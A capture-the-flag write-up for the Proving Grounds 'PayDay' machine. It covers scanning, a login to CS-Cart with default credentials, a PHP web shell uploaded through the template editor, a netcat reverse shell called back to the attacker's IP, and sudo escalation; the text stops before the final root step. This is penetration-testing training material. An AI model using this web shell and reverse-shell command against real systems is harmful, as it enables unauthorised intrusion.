Payday

Introduction

This write-up details the steps taken to solve the PayDay machine from Proving Grounds Practice. The approach includes reconnaissance, enumeration, exploitation, and privilege escalation to gain root access.

Reconnaissance

Initial Nmap Scan

To begin the process, an nmap scan was conducted to identify open ports and services running on the target machine:

sudo nmap -sSCV -n -T4 -Pn -p- 192.168.249.39

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_  2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: CS-Cart. Powerful PHP shopping cart software
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING TOP CAPA STLS SASL UIDL
|_ssl-date: 2025-03-08T10:20:32+00:00; +8s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: THREAD=REFERENCES SASL-IR completed OK MULTIAPPEND UNSELECT LITERAL+ SORT Capability IDLE LOGIN-REFERRALS LOGINDISABLEDA0001 STARTTLS NAMESPACE CHILDREN IMAP4rev1
|_ssl-date: 2025-03-08T10:20:32+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
445/tcp open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imap    Dovecot imapd
|_ssl-date: 2025-03-08T10:20:33+00:00; +8s from scanner time.
|_imap-capabilities: THREAD=REFERENCES SASL-IR AUTH=PLAINA0001 OK MULTIAPPEND UNSELECT LITERAL+ SORT IDLE LOGIN-REFERRALS completed Capability NAMESPACE CHILDREN IMAP4rev1
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
995/tcp open  ssl/pop3    Dovecot pop3d
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_ssl-date: 2025-03-08T10:20:32+00:00; +8s from scanner time.
|_pop3-capabilities: RESP-CODES PIPELINING TOP CAPA USER SASL(PLAIN) UIDL
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.26a)
|   Computer name: payday
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: payday
|_  System time: 2025-03-08T05:20:24-05:00
|_nbstat: NetBIOS name: PAYDAY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 50m07s, deviation: 2h02m28s, median: 7s

Enumeration

Port 80

Upon visiting http://192.168.249.39, the CS-Cart e-commerce software was detected.

A search revealed known vulnerabilities associated with CS-Cart.

Since the version was unknown, directory brute-forcing was performed using Gobuster:

gobuster dir -b 403,404 -u "http://192.168.249.39/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --no-error -t 200 -x txt,php

Here I found an administration login panel, where I tried default credentials and logged in with admin:admin

Navigating to Administration → Upgrade Center, the CS-Cart version was identified.

A known Remote Code Execution (RCE) vulnerability was available for this version.

3. Exploitation – Gaining a Shell

A file upload vulnerability was used to gain RCE via template modification.

📌 Exploit: CS-Cart 1.3.3 Authenticated RCE - Exploit-DB (48891)

Steps to Exploit CS-Cart RCE:

Step 1: Go Look and Feel section click on "template editor".

Step 2: Upload a malicious PHP file, renaming it to .phtml:

echo "<?php echo system('id'); ?>" > test.phtml

Step 3: Access the file

http://192.168.249.39/skins/whoami.phtml

This confirmed command execution.

Step 4: Modify the script for a reverse shell:

<?php echo system($_GET['cmd']); ?>

Step 5: Start a listener on the attacking machine:

nc -nvlp 4444

Step 6: Trigger the reverse shell by visiting:

http://192.168.249.39/skins/test.phtml?cmd=nc%20192.168.45.184%204444%20-e%20/bin/sh

TTY Treatment

Once I had successfully established the reverse shell, the session was not as stable or user-friendly as it could be. The shell I obtained was non-interactive, meaning it didn’t allow me to perform typical interactive tasks like tab completion, command history, or using commands like sudo properly.

To resolve this, I applied a TTY treatment to the shell, making it more stable and interactive. This was done by upgrading the shell to a fully interactive terminal using the following command:

script /dev/null -c bash
CTRL + z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 53 columns 236

After checking the contents of the patricks's directory, I discovered the user flag.

Lateral Movement (www-data -> patrick)

Step 1: Checking MySQL Credentials

Since MySQL (3306) was running, configuration files were inspected for credentials.

Inside /var/www/config.php, root credentials for MySQL were found, but they did not yield direct privilege escalation.

Step 2: Checking User Credentials

After spending time enumerating, the username & password patrick:patrick worked for SSH login.

Privilege Escalation (patrick -> root)

Checking Sudo permissions

Patrick had full sudo privileges.

This means that root access could be obtained with: